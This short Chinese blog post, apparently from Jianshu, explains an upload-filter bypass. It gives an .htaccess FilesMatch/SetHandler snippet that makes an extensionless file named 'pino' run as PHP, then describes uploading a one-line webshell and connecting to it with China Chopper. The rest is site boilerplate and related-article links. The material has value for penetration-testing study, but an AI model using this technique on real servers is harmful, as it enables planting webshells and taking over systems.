【文件上传】.htaccess攻击

0x01 前言

有的时候由于各种名单的原因,可能我们只能上传任何php文件,而且还没有其他地方来解析成php,咋办?如果你能上传.htaccess文件的话,那么就很好办了。

0x02 .htaccess攻击

建一个.htaccess 文件,里面的内容如下:
<FilesMatch "pino">
SetHandler application/x-httpd-php
</FilesMatch>

这个时候就上传一个文件名字是pino,这个时候我们上传一个文件名字叫做pino的文件,不要后缀名,然后里面是一句话木马,用菜刀连接,可以成功!

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 文件上传漏洞
    文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直...
    付出从未后悔阅读 1,245评论 0 4
  • 文件上传漏洞初探
    一、初步认识 1.上传功能:网站上各种可以上传文件,图片的地方可以被用作上传点进行非法上传 2.上传原理:在前端代...
    楠昭阅读 1,782评论 1 11
  • apache下的htaccess伪静态文件
    此文章转载~ Apache伪静态(Rewrite).htaccess文件详解 Htaccess(超文本访问)是一个...
    bornfreekiss阅读 4,270评论 0 6
  • 【文件上传】PHP文件上传漏洞
    0x01 文件上传漏洞 文件上传漏洞顾名思义就是用户上传一个可执行的脚本文件,获得了执行服务器端命令的能力。通常,...
    Pino_HD阅读 1,958评论 0 0
  • 你的人生过得好吗
    身体已向我敲起了警钟,似乎看到了自己的倒计时,你的人生过得好吗? 我还一无所有,
    小毛猴阅读 310评论 0 0

友情链接更多精彩内容